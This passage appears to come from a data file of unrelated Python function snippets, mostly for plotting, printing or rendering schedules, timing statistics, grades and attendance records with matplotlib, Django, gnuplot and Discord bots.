data[\"yield_rainfed_ana\"],'bx')\n plt.title([variables[i]])\n Z = lowess(data['yield_rainfed_ana'], data[variables[i]],frac=0.3,it=3)\n plt.plot(Z[:,0], Z[:,1], 'g-', lw=5)\n plt.title(\"Response for %s\"%(variables[i]))\n plt.show()", "def print_time_stats(self):\n walk_total = 0\n bus_total = 0\n for passenger in self.passengers:\n time = self._passenger_trip_time(passenger)\n walk_total += time[\"walk\"]\n bus_total += time[\"bus\"]\n av_bus_time = bus_total / self.total_passengers\n av_walk_time = walk_total / self.total_passengers\n\n print(f\"Average time on bus: {av_bus_time:.0f} min\")\n print(f\"Average walking time: {av_walk_time:.0f} min\")", "def output_tasks_launched_versus_time(self, output_directory):\r\n gnuplot_file = open(\"%s/task_launches_vs_time.gp\" % output_directory, \"w\")\r\n gnuplot_file.write(\"set terminal postscript color 'Helvetica' 12\\n\")\r\n gnuplot_file.write(\"set output '%s/task_launches_vs_time.ps'\\n\" % output_directory)\r\n gnuplot_file.write(\"set xlabel 'Time (ms)'\\n\")\r\n gnuplot_file.write(\"set ylabel 'Tasks Launched'\\n\")\r\n gnuplot_file.write(\"plot \")\r\n\r\n job_count = 0\r\n for id, request in self.__requests.items():\r\n results_filename = \"%s/%s_tasks_launched_vs_time\" % (output_directory, id)\r\n file = open(results_filename, \"w\")\r\n arrival_time, reservation_replies = request.get_scheduler_get_task_times()\r\n reservation_count = 0\r\n file.write(\"0\\t0\\n\")\r\n for reservation in reservation_replies:\r\n reservation_count += 1\r\n # Write the elapsed time since the request arrived.\r\n file.write(\"%s\\t%s\\n\" % (reservation - arrival_time, reservation_count))\r\n file.close()\r\n\r\n if job_count != 0:\r\n gnuplot_file.write(\",\\\\\\n\")\r\n gnuplot_file.write(\"'%s' using 1:2 lw 1 with lp\" % results_filename)\r\n job_count += 1\r\n if job_count >= 20:\r\n break\r\n gnuplot_file.close()", "def view_data():\n with open(\"./timetracker.csv\", \"r\", newline=\"\") as fileX:\n # reading csv file\n reader = csv.reader(fileX)\n\n # designing dataframe for saved data\n print(\"\\n\\t\\t\\t\\tSaved Data\", end=\"\\n\\t\\t\\t\\t\")\n print(\"*\" * 10, end=\"\\n\\n\")\n print(\"Date\", (\" \"*10)+\"Start time\", (\" \"*3)+\"AM/PM\", (\" \"*4)+\"End time\", \n (\" \"*5)+\"AM/PM\", (\" \"*4)+\"Hours\", (\" \"*3)+\"Mins\", (\" \"*2)+\"Amount earned($)\")\n print(\"-\" * 94)\n \n Total_hours = 0\n Total_mins = 0\n Total_amount = 0\n for row in reader:\n Total_hours += int(row[5])\n Total_mins += int(row[6])\n Total_amount += float(row[7])\n print(\"\\n\")\n for i in range(len(row)):\n print(row[i], end=\" \" * 8)\n\n print(\"\\n\\n\\nTotal number of hours worked = {}\".format(Total_hours))\n print(\"-\" * 35)\n print(\"Total number of minutes worked = {}\".format(Total_mins))\n print(\"-\" * 35)\n print(\"Total amount earned = ${:.2f}\".format(Total_amount))\n print(\"-\" * 35)\n print(\"\\nThanks for using Time Tracker!❤\\n\")", "def print_schedule(self):\n for entry in self.entries:\n print(entry.get_entry_string())", "def plot_trinity(time, data, lgnd=None):\n pylab.figure()\n pylab.plot(time, data)\n pylab.xlabel('time, s')\n pylab.ylabel('data')\n pylab.title('Triad Plotter')\n if lgnd != None:\n pylab.legend((lgnd[0], lgnd[1], lgnd[2]))\n pylab.grid(True)\n\n pylab.show()", "async def listlaunches(self, ctx, *args):\n if not can_answer(ctx):\n return\n num = 5\n for arg in args:\n if arg.isdigit():\n num = int(arg)\n launches = launchlibrary.Launch.fetch(api, status=(1,2))[:num]\n if launches[0].agency != None:\n embedcolor = discord.Colour(await get_color(launches[0].agency.id))\n else:\n embedcolor = discord.Colour(5592405)\n msg = discord.Embed(title=\"Listing next launches: \", colour=embedcolor)\n IDs = []\n for launch in launches:\n launchtime = launch.net\n utc = datetime.now(timezone.utc)\n T = chop_microseconds(launchtime - utc)\n if launch.status == 1:\n value = \"T-: {0}\".format(T)\n else:\n value = \"T-: {0}; {1}\".format(T, launch.get_status().name)\n msg.add_field(name=launch.name, value=value, inline=False)\n IDs.append(launch.id)\n footer = 'IDs: ' + ', '.join(str(x) for x in IDs)\n msg.set_footer(text=footer)\n await ctx.send(embed=msg)", "def screen_lines_for_time(self, day, time):\n if day in self.tutors and time in self.tutors[day]:\n current = self.tutors[day][time]\n else:\n current = []\n\n if len(current) > 0:\n return [Line(\"Current Tutors:\")] + [Line(person) for person in current]\n else:\n return [Line(\"No Tutors on Duty\", center=True)]", "def view_attendance(request):\n\n\tcontext_dict = {\n\t\t'title': 'All Attendance',\n\t}\n\treturn render(request, \"viewAttendance.html\", context_dict)", "def plot_tap(file: str, before: DataFrame, during: DataFrame, after: DataFrame, time_col: str):\n\n print(\"Making plots at time \" + str(before[time_col].iloc[0]))\n\n for file_name in file_names:\n for y in y_columns[file_name]:\n\n ax = before.plot(time_col, y, kind = 'scatter', color = 'blue', label = 'Before Tap')\n after.plot(time_col, y, kind = 'scatter', color = 'red', label = 'After Tap', ax = ax)\n during.plot(time_col, y, kind = 'scatter', color = 'black', label = 'During Tap', ax = ax)\n plt.axes(ax)\n plt.xlabel('Event Time')\n plt.ylabel(y)\n\n min_x = before[time_col].iloc[0] - (before[time_col].iloc[1] - before[time_col].iloc[0]) * 50\n min_y = min([min(during[y]), min(before[y]), min(after[y])])\n # Mark the mean during tap event (Feature 1)\n mean_during = mean(during[y])\n mean_before = mean(before[y])\n mean_after = mean(after[y])\n plt.hlines(y = mean_during, xmin = min_x, xmax = during[time_col].iloc[-1], linestyle='dashed', \\\n color='black')\n plt.annotate(xy = (min_x, mean_during), s = 'avgDuringTap')\n # Mark the mean before\n plt.hlines(y = mean_before, xmin = min_x, xmax = before[time_col].iloc[-1], linestyle='dashed', \\\n color='blue')\n plt.annotate(xy = (min_x, mean_before), s = 'avg100msBefore')\n # Mark the mean after\n plt.hlines(y = mean_after, xmin = min_x, xmax = after[time_col].iloc[-1], linestyle='dashed', \\\n color='red')\n plt.annotate(xy = (min_x, mean_after), s = 'avg100msAfter')\n\n plt.legend()\n\n plt.savefig(file+'_'+y+'_time_'+str(before[time_col].iloc[0]) + '.png')\n\n plt.close()", "def about(request, pk=None):\n if pk and get_grouptype('3') in request.user.groups.all():\n ts = get_object_or_404(TimeSlot, pk=pk)\n else:\n ts = get_timeslot()\n return render(request, \"results/about_grades.html\", {\n 'scores': CategoryAspectResult.ResultOptions,\n \"categories\": GradeCategory.objects.filter(TimeSlot=ts),\n 'ts': ts,\n })", "def list_tables(option, opt, value, parser):\n print \"CCP Data Dump Table List\"\n print \"------------------------\"\n for table in util.IMPORT_LIST:\n print \"%s\" % table.__name__.replace('Importer_', '')\n print \"-- %d tables --\" % len(util.IMPORT_LIST)\n # The -l argument is just used for listing, proceed no further.\n exit_with_succ()", "def get_students_problem_grades(request, csv=False):\r\n module_state_key = Location.from_deprecated_string(request.GET.get('module_id'))\r\n csv = request.GET.get('csv')\r\n\r\n # Query for \"problem grades\" students\r\n students = models.StudentModule.objects.select_related('student').filter(\r\n module_state_key=module_state_key,\r\n module_type__exact='problem',\r\n grade__isnull=False,\r\n ).values('student__username', 'student__profile__name', 'grade', 'max_grade').order_by('student__profile__name')\r\n\r\n results = []\r\n if not csv:\r\n # Restrict screen list length\r\n # Adding 1 so can tell if list is larger than MAX_SCREEN_LIST_LENGTH\r\n # without doing another select.\r\n for student in students[0:MAX_SCREEN_LIST_LENGTH + 1]:\r\n student_dict = {\r\n 'name': student['student__profile__name'],\r\n 'username': student['student__username'],\r\n 'grade': student['grade'],\r\n }\r\n\r\n student_dict['percent'] = 0\r\n if student['max_grade'] > 0:\r\n student_dict['percent'] = round(student['grade'] * 100 / student['max_grade'])\r\n results.append(student_dict)\r\n\r\n max_exceeded = False\r\n if len(results) > MAX_SCREEN_LIST_LENGTH:\r\n # Remove the last item so list length is exactly MAX_SCREEN_LIST_LENGTH\r\n del results[-1]\r\n max_exceeded = True\r\n\r\n response_payload = {\r\n 'results': results,\r\n 'max_exceeded': max_exceeded,\r\n }\r\n return JsonResponse(response_payload)\r\n else:\r\n tooltip = request.GET.get('tooltip')\r\n filename = sanitize_filename(tooltip[:tooltip.rfind(' - ')])\r\n\r\n header = [_(\"Name\").encode('utf-8'), _(\"Username\").encode('utf-8'), _(\"Grade\").encode('utf-8'), _(\"Percent\").encode('utf-8')]\r\n for student in students:\r\n\r\n percent = 0\r\n if student['max_grade'] > 0:\r\n percent = round(student['grade'] * 100 / student['max_grade'])\r\n results.append([student['student__profile__name'], student['student__username'], student['grade'], percent])\r\n\r\n response = create_csv_response(filename, header, results)\r\n return response", "async def _timein_list(self):\n\t\t\n\t\tmessage = 'Favourites\\n```Name: Timezones\\n'\n\t\t\n\t\tfor fav in self.favourites:\n\t\t\tmessage += fav + ': '\n\t\t\tmessage += self.favourites[fav].replace(',', ', ').replace('_', ' ') + '\\n'\n\t\t\n\t\tmessage += '```'\n\t\tawait self.bot.say(message)", "def generate_access_time_plot(id_lists):\n bins = [1]\n points = []\n for l in id_lists:\n mapped = [(x, bins[-1]) for x in l]\n points += mapped\n bins.append(bins[-1] + 1)\n return points, bins", "def sna_viz(request):\n timestamps = []\n for i in Source.objects.filter(user=request.user):\n timestamps.append({'id':i.source_id, 'val':i.datetime_extracted.strftime('%d/%m/%Y %H:%M') + \" \" + i.source})\n return render(request, 'sna_viz.html', {'timestamps':timestamps})", "def print_grades(grades, grader_name):\n grades = sorted(grades,\n key=lambda grade: grade.student_name())\n # Length of longest name\n max_name_len = max(len(grade.student_name()) for grade in grades)\n\n grade_report = '\\n'.join(\n '{:<{max_name_len}}\\t{}\\t{}'.format(\n grade.student_name(),\n grade.score() if grade.graded() else '(ungraded)',\n grade.breakdown(grader_name) if grade.graded() else '',\n max_name_len=max_name_len)\n for grade in grades)\n click.echo_via_pager('grade report:\\n\\n' + grade_report)", "def plot_overscan_variation(t_lst, overscan_lst, figfile):\n \n # Quality check plot of the mean overscan value over time \n fig = plt.figure(figsize=(8,6), dpi=150)\n ax2 = fig.add_axes([0.1,0.60,0.85,0.35])\n ax1 = fig.add_axes([0.1,0.15,0.85,0.35])\n #conversion of the DATE-string to a number\n date_lst = [dateutil.parser.parse(t) for t in t_lst]\n datenums = mdates.date2num(date_lst)\n\n ax1.plot_date(datenums, overscan_lst, 'r-', label='mean')\n ax2.plot(overscan_lst, 'r-', label='mean')\n for ax in fig.get_axes():\n leg = ax.legend(loc='upper right')\n leg.get_frame().set_alpha(0.1)\n ax1.set_xlabel('Time')\n ax2.set_xlabel('Frame')\n ax1.set_ylabel('Overscan mean ADU')\n ax2.set_ylabel('Overscan mean ADU')\n # adjust x and y limit\n y11,y12 = ax1.get_ylim()\n y21,y22 = ax2.get_ylim()\n z1 = min(y11,y21)\n z2 = max(y21,y22)\n ax1.set_ylim(z1,z2)\n ax2.set_ylim(z1,z2)\n ax2.set_xlim(0, len(overscan_lst)-1)\n # adjust rotation angle of ticks in time axis\n plt.setp(ax1.get_xticklabels(),rotation=30)\n\n # save figure\n fig.savefig(figfile)\n plt.close(fig)", "def tentative_schedule(request):\n\n\tshows_dict = {\n\t\t0: [],\n\t\t1: [],\n\t\t2: [],\n\t\t3: [],\n\t\t4: [],\n\t\t5: [],\n\t\t6: []\n\t}\n\n\tfor i in range(7):\n\t\tfor show in Show.objects.filter(day=i).order_by('time'):\n\t\t\t\tshow_time = show.time\n\t\t\t\tdj = str(show.dj)\n\t\t\t\tif show.co_dj and str(show.co_dj) != \"Unknown Dj\":\n\t\t\t\t\tdj += \" & \" + str(show.co_dj)\n\t\t\t\tshows_dict[i].append([dj, show_time.strftime('%I:%M %p')])\n\n\treturn render(request, 'tentative_schedule.html', {\n\t\t\t'shows_dict': shows_dict\n\t})", "def visualizations():\r\n raise NotImplementedError\r\n # df = pandas.read_csv('accidents_by_hour.csv', index_col=0, header=0)\r\n # plt.plot(0, 0, data=df)\r\n # plt.show()\r", "def time_tracking(self):\n fb = FreshBooks()\n tg = Toggl()\n self.print_splash()\n self.print(\"Tip: You can always enter 'skip' when you want to skip a time entry.\", format='warn')\n days = self.get_interactive_days() # number of days to go back\n self.print(\"OK, I'll run you through the Toggl time entries of the past %i day(s).\" % (days))\n timestamp = self.get_timestamp(days) # unix timestamp including tz\n time_entries = tg.get_time_entries(timestamp)\n if len(time_entries) == 0:\n self.print(\"No Toggl entries in this time span!\", 'warn')\n return False\n time_entries = self.merge_toggl_time_entries(time_entries) # merge Toggl entries\n fb_projects = fb.get_projects()\n # Loop through merged Toggl time entries:\n for entry in time_entries:\n # Get and convert all necessary info:\n client_id = tg.get_client_id(project_id=entry.get('pid'))\n client_name = tg.get_client_name(client_id)\n project = tg.get_project(entry.get('pid'))\n duration = int(entry['duration']) / 60 / 60 # convert duration to hours\n duration = round(duration * 4 ) / 4 # round hours to nearest .25\n description = self.format_description(project['name'], entry['description'])\n date = str(parser.parse(entry['start']).date())\n # Print info in a nice way:\n self.print_divider(30)\n self.print(\"Description: \" + description)\n self.print(\"Date: \" + date)\n self.print(\"Hours spent: \" + str(duration))\n # Skip if Toggl entry is already booked:\n if entry.get('tags') and tg.BOOKED_TAG in entry['tags']:\n self.print(\"Skipping this entry because it is already in Freshbooks.\", 'cross')\n # Skip if duration is below 0.25:\n elif duration < 0.25:\n self.print(\"Skipping this entry because there are less than 0.25 hours spent.\", 'cross')\n # If billable, add to Freshbooks:\n elif entry['billable']:\n # Get FreshBooks project name through interactive search:\n try:\n self.print(\"Project: \\U0001F50D \")\n fb_project_name = self.interactive_search(fb_projects.keys(), client_name)\n # Handle KeyboardInterrupt\n except KeyboardInterrupt:\n answer = input(\"\\nKeyboardInterrupt! Skip current entry or quit time tracking? (S/q) \")\n if answer.lower() == 's' or answer == '':\n self.clear_lines(1)\n self.print(\"Skipping this entry.\", 'cross')\n continue\n else:\n self.clear_lines(1)\n self.print(\"Ok, stopping time tracking.\", 'cross')\n sys.exit()\n # If user requests so, skip this entry:\n self.clear_lines(1)\n if not fb_project_name:\n self.print(\"Skipping this entry.\", 'cross')\n continue\n # Otherwise, add entry to FreshBooks and tag Toggl entry/entries:\n self.print(\"Project: \" + fb_project_name)\n project_id = fb.get_project_id(fb_project_name)\n fb.add_entry(project_id, duration, description, date)\n tg.tag_projects(entry['merged_ids'], tg.BOOKED_TAG)\n # If not billable, skip entry:\n else:\n self.print(\"Skipping this entry because it is not billable.\", 'cross')\n self.print_divider(30)\n answer = input(\"All done! Open FreshBooks in browser to verify? (Y/n) \")\n if answer.lower() == 'y' or answer == '':\n webbrowser.open('https://%s.freshbooks.com/timesheet' % fb.fb_creds['subdomain'])", "def __statistics_students_failing(self):\n students_list = self.__grade_controller.get_list_of_failing_students()\n if len(students_list) == 0:\n print(\"There is no student failing!\")\n return\n\n for student in students_list:\n print(str(student) + \"\\n\")", "def test():\n data1 = resources_vs_time(0.0, 50)\n data2 = resources_vs_time(1.0, 10)\n data3 = resources_vs_time(2.0, 10)\n data4 = resources_vs_time(0.5, 10)\n print data1\n simpleplot.plot_lines(\"Growth\", 600, 600, \"time\", \"total resources\", [data1])", "def plot_table(self):\r\n q = dict(sorted(decorator.arr.items(), key=lambda item: item[1]))\r\n print(\"PROGRAM | RANK | TIME ELAPSED\")\r\n count = 1\r\n for i in q:\r\n print(i[0], \"\\t\", count, \"\\t\", float(q[i]) * 1000, \"ms\")\r\n count += 1", "def plot_timecourses(timecourses, output_file):\n\tpyplot.plot(timecourses)\n\tpyplot.savefig(output_file)", "def display(self):\n \n # initialize SQL kit to access database\n s = SQL_Kit(self.userID, self.password, self.database)\n \n \n \"\"\" Total Activity by hour \"\"\"\n \n # get activity data\n all_date_times = self.activity().index\n\n all_days = []\n all_hours = []\n for item in all_date_times:\n all_days.append((item.timetuple().tm_yday))\n all_hours.append(item.hour)\n\n x = all_days\n y = all_hours\n x_labels = pd.Series(all_days).unique()\n\n fig1, ax1 = plt.subplots()\n ax1.set_title('Hourly Activity')\n ax1.scatter(x,y,color='mediumspringgreen',linewidths=1)\n ax1.set_xlabel('day of year')\n ax1.set_ylabel('hour')\n ax1.xaxis.grid(True)\n\n if len(x_labels) > 5:\n ax1.xaxis.set_ticks([min(all_days), max(all_days)])\n else:\n ax1.xaxis.set_ticks(x_labels)\n\n ax1.yaxis.grid(False) \n plt.show()\n \n \n \"\"\" MOVING AVERAGE \"\"\"\n \n df = self.activity().reset_index()\n\n def day_of_year(datetime_entry):\n return datetime_entry.timetuple().tm_yday\n\n df['day_of_year'] = list(df.apply(lambda x: day_of_year(x['EventDateTime']),axis=1))\n daily_count = df['day_of_year'].value_counts().sort_index()\n\n averages = []\n i=1\n for value_count in daily_count:\n values = daily_count[:i]\n average = round(sum(values)/len(values),2)\n averages.append(average)\n i+=1\n\n day_list = list(df['day_of_year'].unique())\n\n avg_move_df = pd.DataFrame([day_list,averages]).T\n avg_move_df.rename(columns={0: 'day_id', 1: 'moving_avg'},inplace=True)\n avg_move_df.set_index('day_id',inplace=True)\n \n fig1, ax1 = plt.subplots()\n ax1.plot(avg_move_df.index.astype(int),avg_move_df['moving_avg'], color='mediumspringgreen')\n ax1.set_title('Moving AVG')\n ax1.set_xlabel('day_of_year')\n ax1.xaxis.set_ticks([min(all_days), max(all_days)])\n ax1.set_ylabel('Daily Activity')\n plt.show()\n \n \n \n \"\"\" Top 5 Samples \"\"\"\n \n data = s.select_table('sample')['SoundCategory'].value_counts()\n \n objects = list(data)[:5]\n y_pos = list(data.index)[:5]\n\n # get class info from class_absence_stats dataframe\n #fig2 = plt.figure(2) \n plt.bar(y_pos, objects, align='center', alpha=0.8, color='mediumspringgreen')\n plt.ylabel('Usage')\n plt.xlabel('Sound Category')\n plt.title('Top 5 Samples')\n plt.show()\n \n \n \"\"\" Top 3 Chords \"\"\"\n \n data = s.select_table('chord')['ChordLabel'].value_counts()\n\n objects = list(data)[:3]\n y_pos = list(data.index)[:3]\n\n # get class info from class_absence_stats dataframe\n #fig2 = plt.figure(2) \n plt.bar(y_pos, objects, align='center', alpha=0.8, color='mediumspringgreen')\n plt.ylabel('Usage')\n plt.xlabel('Chord Label')\n plt.title('Top 3 Chords')\n plt.show()\n \n \n \"\"\" Top 3 Wave Types \"\"\"\n \n # get SQL table data\n set_1 = s.select_table('createwave')\n set_2 = s.select_table('sequence')\n set_3 = s.select_table('arpeggio')\n set_4 = s.select_table('chord')\n\n # concat tables into single pandas series\n all_wave_types = pd.concat([set_1['WaveType'], set_2['WaveType'], set_3['WaveType'], set_4['WaveType']])\n\n # sort values, show top 3\n top_3 = all_wave_types.value_counts().head(3)\n\n\n # Pie chart, where the slices will be ordered and plotted counter-clockwise:\n labels = list(top_3.index)\n sizes = list(top_3.values)\n explode = (0, 0, 0) # only \"explode\" the 2nd slice (i.e. 'Hogs')\n\n fig1, ax1 = plt.subplots()\n ax1.pie(sizes, explode=explode, labels=labels, autopct='%1.1f%%',\n shadow=True, colors=['g','b','r'], startangle=90)\n ax1.axis('equal') # Equal aspect ratio ensures that pie is drawn as a circle.\n ax1.set_title('Top Wave Types')\n\n plt.show()", "def plotLockTime(SVID, signalTypes, dataMeasSVID, lliIndices, lliTOWs, verbose):\n # print('\\nplotLockTime' + '-' * 25)\n gnssSyst, gnssSystShort, gnssPRN = mSSN.svPRN(SVID)\n\n # for i, signalType in enumerate(signalTypes):\n # print('PLT: signalType[%d] = %s' % (i, signalType))\n # print('PLT: TOW = %s (%d)' % (dataMeasSVID[i]['MEAS_TOW'], len(dataMeasSVID[i]['MEAS_TOW'])))\n # print('PLT: lockTimes = %s (%d)\\n' % (dataMeasSVID[i]['MEAS_LOCKTIME'], len(dataMeasSVID[i]['MEAS_LOCKTIME'])))\n # print(\"PLT: indexLossOfLock[%d] = %s (Nr = %d)\" % (i, lliIndices[i], len(lliIndices[i])))\n # # myData2 = dataMeasSVID[i][lliIndices[i]]\n # # print(\"PLT: myData2 = %s (len = %d)\" % (myData2['MEAS_TOW'], len(myData2['MEAS_TOW'])))\n # # print(\"PLT: idemand = %s (len = %d)\\n\" % (dataMeasSVID[i][lliIndices[i]]['MEAS_TOW'], len(dataMeasSVID[i][)lliIndices[i]]['MEAS_TOW']))\n\n # create the plot window\n # plt.style.use('BEGPIOS')\n plt.style.use('ggplot')\n plt.figure(1)\n subPlot = plt.subplot(1, 1, 1)\n # titles and axis-labels\n dateString = gpstime.UTCFromWT(float(dataMeasSVID[0]['MEAS_WNC'][0]), float(dataMeasSVID[0]['MEAS_TOW'][0])).strftime(\"%d/%m/%Y\")\n plt.title('Lock Times for %s PRN %d (%d)' % (gnssSyst, gnssPRN, SVID)) # , fontsize='18'\n plt.ylabel('Lock Time [s]')\n plt.xlabel('Time [hh:mm] (' + dateString + ')')\n\n for index, signalType in enumerate(signalTypes):\n # lockTime = dataMeasSVID[index]['MEAS_LOCKTIME']\n # print(\"index = %d lockTime.size = %d\" % (index, len(lockTime)))\n sigTypeColor = mPlt.getSignalTypeColor(signalType)\n\n utc = []\n for count in range(0, len(dataMeasSVID[index])):\n utc.append(gpstime.UTCFromWT(float(dataMeasSVID[index]['MEAS_WNC'][count]), float(dataMeasSVID[index]['MEAS_TOW'][count])))\n\n plt.plot(utc, dataMeasSVID[index]['MEAS_LOCKTIME'], color=sigTypeColor, linestyle='', markersize=0.75, marker='.')\n\n # add a marker at the LLI\n utc2 = []\n for count2 in range(0, len(dataMeasSVID[index][lliIndices[index]])):\n utc2.append(gpstime.UTCFromWT(float(dataMeasSVID[index][lliIndices[index]]['MEAS_WNC'][count2]), float(dataMeasSVID[index][lliIndices[index]]['MEAS_TOW'][count2])))\n plt.plot(utc2, dataMeasSVID[index][lliIndices[index]]['MEAS_LOCKTIME'], color=sigTypeColor, linestyle='', markersize=7, markerfacecolor=sigTypeColor, marker=mPlt.mFilledMarkers[signalType % len(mPlt.mFilledMarkers)])\n\n # annotate the plot\n annotateTxt = mSSN.GNSSSignals[signalType]['name'] + str(': %d LLI' % len(lliIndices[index]))\n subPlot.text(0.02, 0.95 - index * 0.0375, annotateTxt, verticalalignment='bottom', horizontalalignment='left', transform=subPlot.transAxes, color=sigTypeColor, fontsize=12)\n\n # make x-axis a hh:mm:ss\n ax = plt.gca()\n xfmt = md.DateFormatter('%H:%M:%S')\n ax.xaxis.set_major_formatter(xfmt)\n\n # adjust range for Y axis\n axes = plt.gca()\n axes.set_ylim(mPlt.adjustYAxisLimits(axes))\n axes.set_xlim(mPlt.adjustXAxisLimits(axes))\n\n plt.text(0, -0.125, r'$\\copyright$ Alain Muls (alain.muls@rma.ac.be)', horizontalalignment='left', verticalalignment='bottom', transform=ax.transAxes, alpha=0.5, fontsize='x-small')\n plt.text(1, -0.125, r'$\\copyright$ Frederic Snyers (fredericsn@gmail.com)', horizontalalignment='right', verticalalignment='bottom', transform=ax.transAxes, alpha=0.5, fontsize='x-small')\n # mPlt.annotateText(r'$\\copyright$ Alain Muls (alain.muls@rma.ac.be)', subPlot, 0, -0.12, 'left', fontsize='x-small')\n # mPlt.annotateText(r'$\\copyright$ Frederic Snyers (fredericsn@gmail.com)', subPlot, 1, -0.12, 'right', fontsize='x-small')\n\n fig = plt.gcf()\n # fig.set_size_inches(12*2.5, 9*2.5)\n fig.savefig('%s-%s%d-locktime.png' % (gnssSyst, gnssSystShort, gnssPRN), dpi=fig.dpi)\n\n if verbose:\n plt.show(block=False) # block=False)\n\n # close the figure\n # plt.close()", "def showClock(hour: int, min: int):\n pass", "def printSchedule():\r\n print(\"{0:^45}\".format(\"Your Schedule:\\n\"))\r\n print(\" Day Class Time\")\r\n if(len(classes) == 0):\r\n print(\"\\nThere are no classes\\n\")\r\n return\r\n for class_ in classes:\r\n print(class_.scheduleString())\r\n print()", "def plot_time(time_to_complete, plot_num):\n average = []\n for i, point in enumerate(time_to_complete):\n average.append(sum(time_to_complete[:i+1])/ (i+1))\n plt.plot(time_to_complete, color= 'blue', label=\"Epoch Time\")\n plt.plot(average, color = 'red', label= \"Average Time\", zorder = 3)\n plt.legend()\n plt.title(\"Time to complete FetchReach\")\n plt.ylabel(\"Time (seconds)\")\n plt.xlabel(\"Number iterations\")\n plt.savefig(\"./plots/time/time_to_complete_{}.png\".format(plot_num))\n plt.clf()", "def list_experiments(self):\n subfolders = self.um.list_subfolders(\"data/*/\")\n experiment_folders = self.um.list_experiments(subfolders)\n experiments = list()\n for exp in experiment_folders:\n try:\n date = self.um.timestamp_to_date(int(exp) / 1000)\n exp_class = experiment.experiment(new_experiment=False, ts=exp)\n\n if \"label\" in exp_class.metadata:\n label = exp_class.metadata[\"label\"]\n else:\n label = None\n\n exp_dict = {\"date\": date,\n \"ts\": exp,\n \"label\": label\n }\n experiments.append(exp_dict)\n except:\n print \"Skipped\"\n\n return render_template('experiments.html', user=experiments)", "def getTimes():", "def getTimes():", "def getTimes():", "def view_all_students():\n message = ''\n global conn\n with conn:\n rows = select_all_students(conn)\n for row in rows:\n message += str(row) + \"\\n\"\n messagebox.showinfo('Student Table', message)", "def queriesInEachHour(self):\n hours = 0\n\n #prints out each element (with number of DB Queries) of array\n while hours < 24:\n print (hours,'to',hours+1, ' : ', self.arrayOfTimes[hours])\n hours += 1", "def timeline(self, **kwargs):\n\n def rtm(n, multiple=10):\n \"\"\"Round to multiple.\"\"\"\n return int(multiple * round(float(n) / multiple))\n\n beginning_minutes = 7 * 60 + 20 # starting time is 7:20\n end_minutes = 21 * 60 # ending time is 21:00\n\n interval = 100 # 100 minutes for each period (90 + 10)\n\n total_minutes = ((end_minutes - beginning_minutes) // interval + 1) * interval\n number_of_intervals = total_minutes // interval\n\n segments = total_minutes // 10\n days = {i: [[' '] * segments + ['│']] for i in range(5)}\n\n for course in self.get_sorted_courses(include_unscheduled=False):\n i = (rtm(course.time.start) - beginning_minutes) // 10\n width = (rtm(course.time.end) - rtm(course.time.start)) // 10\n\n day = 0\n for j in range(i, i + width):\n if days[course.weekday()][day][j] != ' ':\n day += 1\n if len(days[course.weekday()]) == day:\n days[course.weekday()].append([' '] * segments + ['│'])\n\n days[course.weekday()][day][i] = '{'\n days[course.weekday()][day][i + width - 1] = '}'\n\n space = width - 2 # width minus { and }\n\n name = Ansi.color(\n course.abbreviation\n if len(course.abbreviation) <= space\n else course.abbreviation[: space - 1] + \".\",\n course_types[course.type].color,\n )\n\n # TODO: this doesn't center correctly, for some reason\n name = Ansi.center(name, space)\n\n days[course.weekday()][day][i + 1] = name\n for j in range(i + 2, i + width - 1):\n days[course.weekday()][day][j] = ''\n\n # print the header\n print(\n (\" ╭\" + \"─\" * (total_minutes // 10) + \"╮\\n │\")\n + \"\".join(\n Ansi.bold(\n minutes_to_HHMM(beginning_minutes + interval * i)\n .strip()\n .ljust(10, \" \")\n )\n for i in range(number_of_intervals)\n )\n + \"│\\n╭────┼─\"\n + \"\".join(\n \"─\" * number_of_intervals\n + (\"─\" if i != number_of_intervals - 1 else \"┤\")\n for i in range(number_of_intervals)\n )\n )\n\n for i in range(5):\n x = f\"│ {WD_EN[i][:2].capitalize()} │\"\n\n for j, day in enumerate(days[i]):\n if j == 0:\n print(x, end=\"\")\n else:\n print(\"│ │\", end=\"\")\n\n print(\"\".join(day))\n\n # print the very last line\n print(\n \"╰────┴─\"\n + \"\".join(\n \"─\" * number_of_intervals\n + (\"─\" if i != number_of_intervals - 1 else \"╯\")\n for i in range(number_of_intervals)\n )\n )", "def pp_schedule(filename,venue):\n #reading the file\n f = open(filename,\"r\")\n incsv = f.readlines()\n #removing affixes\n incsv[:] = [i.rstrip('\\n') for i in incsv]\n #lines into lists\n tempstr = \"\"\n templist = []\n for j in range(len(incsv)):\n #enters each line into temporary string variable\n tempstr = incsv[j]\n #enters the split string into a temporary list variable\n templist.append(tempstr.split(\",\"))\n #modify original line in original list with split list\n incsv[j] = templist\n #reset temporary variables\n tempstr = \"\"\n templist = []\n #timelist stands for timetable list\n #format of timelist: [[day,[start,end,module],...],...]\n timelist = []\n for k in range(1,8):\n #for each day code add day code\n timelist.append([k])\n #assign and make list for ttint\n #for all lines in file\n for l in range(len(incsv)):\n #if venue in line matches desired venue\n if incsv[l][0][7] == venue:\n #after each day code, add a list with start time, end time and module. Repeat for each relevant line\n timelist[(int(incsv[l][0][3])-1)].append([int(incsv[l][0][5]),int(incsv[l][0][6]),incsv[l][0][0]])\n #turtle\n print(\"Your timetable is being printed on Python Turtle Graphics. This may take a while.\")\n ttint(timelist,venue)", "def mean_time():\n return render_template('mean_time_weekday.html')", "def print_tasks(self):\n unformatted_rows = self.db_link.get_tasks()\n formatted_rows = self.display.format_row(unformatted_rows)\n self.display.print_task_list_formatted(formatted_rows)", "def display_get_date_avg():\n average_date = reports.get_date_avg(filename)\n print(\n \"The average date for all games in {} is: {}\\n\".format(\n filename,\n average_date))", "def plot_task_learnability(task_times: dict, ax: Axes = None) -> Axes:\n means = Series({\n trial_name: mean(times)\n for trial_name, times in task_times.items()\n })\n ax = ax or new_axes()\n means.plot(kind='line', ax=ax, marker=\"s\")\n ax.set_xlabel('Trials')\n ax.set_ylabel('Time-on-Task (Sec')\n ax.set_ylim(0, 80)\n\n return ax", "def print_schedule():\n clear_screen()\n print(\"====Current Schedule====\")\n days = ['sun', 'mon', 'tues', 'wed', 'thurs', 'fri', 'sat']\n with open('current_courses.json', 'r') as current_file:\n schedule = json.load(current_file)\n for day in days:\n for val, val2 in schedule.items():\n if day in val2[0]:\n print(day, val, str(val2[1])+'-'+str(val2[2])+\" Presumed Grade: \"+ val2[3])\n return 0", "def __statistics_disciplines_graded(self):\n disciplines_list = self.__grade_controller.get_list_of_graded_disciplines()\n if len(disciplines_list) == 0:\n print(\"There is no graded discipline!\")\n return\n\n for discipline in disciplines_list:\n print(str(discipline) + 